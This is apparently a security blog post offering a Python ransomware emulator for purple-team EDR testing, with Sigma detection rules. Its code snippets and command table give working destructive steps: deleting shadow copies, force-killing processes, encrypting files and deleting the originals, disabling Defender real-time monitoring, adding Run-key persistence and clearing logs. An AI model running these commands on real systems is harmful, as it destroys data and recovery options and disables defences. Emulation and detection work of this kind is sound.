Author: Valli-Nayagam Chokkalingam

Stop using print-only simulators. This free script emulates real ransomware TTPs – shadow copies, process kills, encryption – and rolls back cleanly. Test your EDR today.

Contents

Disclaimer

This emulator is for authorized purple team training and research only. It is designed to run in an isolated, controlled lab environment (e.g., a disposable VM with a snapshot). Do not run it on any production system, shared network, or without explicit written permission. The author assumes no liability for misuse or damage caused by this software. You have been warned.

The Problem with “Simulators”

Most ransomware simulators print:

[+] Would delete shadow copies now.
[+] Would encrypt file.txt.

That’s not so helpful. Your EDR won’t fire. Your SOC won’t learn. You won’t find gaps.We need real behavior – the exact commands that modern ransomware runs:

  • vssadmin delete shadows /all /quiet
  • taskkill /f /im excel.exe
  • Registry keys under HKCU…\Run
  • Files turning into .qilin (or .locked, .encrypted) in real time

This post gives you a working ransomware emulator that can decrypt all your files, remove persistence and ransom note – but shadow copies, event logs, and Windows Defender settings are permanently altered. You’ll need a VM snapshot for full recovery. The script is modeled on Qilin’s specific configuration (kill list, .qilin extension), but the TTPs apply to LockBit, BlackCat, Conti, and almost every modern ransomware family.

What Modern Ransomware Actually Does (TTPs, Not Fluff)

I analyzed real samples (Qilin, LockBit, BlackCat). Here’s the minimal behavior you need to emulate – these TTPs are shared across families:

TTPTechniqueReal Command
T1486Data Encrypted for ImpactAES‑256, custom extension (.qilin.lockbit, etc.)
T1490Inhibit System Recoveryvssadmin delete shadows /all /quiet
T1562.001Disable or Modify ToolsSet-MpPreference -DisableRealtimeMonitoring
T1562.009Impair Defensestaskkill /f /im sqlservr.exeoutlook.exe, etc.
T1547.001Boot or Logon Autostart ExecutionHKCU\Software\Microsoft\Windows\CurrentVersion\Run
T1070Indicator RemovalPowerShell ClearLog

The table above covers the core destructive TTPs – encryption, shadow copies, process termination, persistence. Qilin has many other TTPs (token manipulation, GPO abuse, ESXi targeting), but those are environment‑specific or too risky for a safe lab. We focused on what matters most for EDR testing on a single Windows host.

Real Qilin (and most ransomware) uses AES‑256 or ChaCha20 for file encryption and RSA‑4096 to protect the key. Our emulator uses Fernet (AES‑128 + HMAC) – a simpler, reversible cipher. The goal is to trigger detection (file extension change, mass file modification) without needing real asymmetric crypto. For EDR testing, the behavior is what matters. Rollback works because we save the key locally.

The Emulator: Code Walkthrough

The emulator is a single Python script. It executes real ransomware actions – but includes a full rollback that decrypts your files and removes persistence. Below are the key code snippets.

The snippets are shortened for readability; they show the core logic. The complete script (with error handling, safety checks, and the full kill list) is on GitHub – https://github.com/AdversaryCraft/ransomware-emulator.

Shadow Copy Deletion (T1490)
def delete_shadow_copies():
subprocess.run("vssadmin delete shadows /all /quiet", shell=True)
subprocess.run("wmic shadowcopy delete", shell=True)
Process Termination (T1562.009)
for proc in ["sqlservr.exe", "outlook.exe", "excel.exe"]:
subprocess.run(f"taskkill /f /im {proc}", shell=True)
File Encryption (T1486)
def encrypt_one_file(file_path, cipher):
   with open(file_path, 'rb') as f:
       plain = f.read()
   encrypted = cipher.encrypt(plain)
   with open(file_path + ".qilin", 'wb') as f:
       f.write(encrypted)
   os.remove(file_path)
Rollback
def rollback():
cipher = Fernet(key)
for root, _, files in os.walk(TARGET_FOLDERS):
for f in files:
if f.endswith(".qilin"):
# decrypt and restore
Safety features included:
  • VM detection (warns if not in VirtualBox/VMware)
  • Admin elevation
  • Self‑protection (never encrypts itself)
  • Extension filtering (only data files, not executables)

Detection Rules That Actually Work

After running the emulator, check if your SIEM caught these.

Sigma: Shadow Copy Deletion

This command is almost never used by legitimate software. Alert on it.

title: Ransomware Shadow Copy Deletion
logsource:
product: windows
service: security
detection:
selection:
EventID: 4688
CommandLine|contains|all:
- 'vssadmin'
- 'delete'
- 'shadows'
Sigma: Mass File Extension Change

The unique extension means zero false positives if you see more than a handful.

title: Ransomware File Extension Change
logsource:
product: windows
service: sysmon
detection:
selection:
EventID: 11
TargetFilename|endswith: '.qilin'
Sigma: Process Termination (taskkill)

Killing Office, SQL, or backup processes in bulk is highly suspicious.

title: Suspicious Taskkill Pattern
logsource:
product: windows
service: security
detection:
selection:
EventID: 4688
CommandLine|contains|all:
- 'taskkill'
- '/f'
- '/im'
What about other TTPs?

Defender disable (Set-MpPreference) has high false positives – monitor only when followed by encryption. Registry Run key writes are medium noise – alert on unsigned paths. Event log clearing (wevtutil cl, Clear-EventLog) is low noise – add a Sigma rule for it.

Start with the three rules above. If your EDR didn’t alert on any of these, you have a gap. Now fix it.

Try It Yourself (5 Minutes)

Prerequisites
  • Windows VM (VMware/VirtualBox) – take a snapshot
  • Python 3.8+
  • pip install cryptography
Clone & Run
git clone https://github.com/AdversaryCraft/ransomware-emulator
cd ransomware-emulator
python ransomware_emulator.py --attack
Rollback
python ransomware_emulator.py --rollback

The script saves the encryption key as ransomware_key.txt. Don’t lose it – but if you do, just revert the VM snapshot. Keep in mind: shadow copies, event logs, and Windows Defender settings are not restored by the rollback – that’s why you need the snapshot.

Limitations (What We Left Out)

Not emulatedWhy
Lateral movement (PsExec)Needs 2 VMs – out of scope for this post
BYOVDWould BSOD your lab
EDR unhookingCan destabilize EDR/process – left out for stability
Real C2 callbacksFake .onion address – no outbound traffic

This covers 80% of ransomware’s impact – the noisy, detectable part. Perfect for purple team training, EDR validation, SOC tuning, and IR drills.

Final Word

Stop reading threat reports and start emulating. Run this script, watch what your EDR misses, then fix it. Works for Qilin, LockBit, BlackCat – any modern ransomware that uses the same TTPs.

https://github.com/AdversaryCraft/ransomware-emulator

References

MITRE ATT&CK – https://attack.mitre.org/software/S1242/

Blackpoint Cyber – https://blackpointcyber.com/threat-profile/qilin-ransomware/

Picus Security – https://www.picussecurity.com/resource/blog/qilin-ransomware

Posted in

Leave a Reply

Discover more from Adversary Craft

Subscribe now to keep reading and get access to the full archive.

Continue reading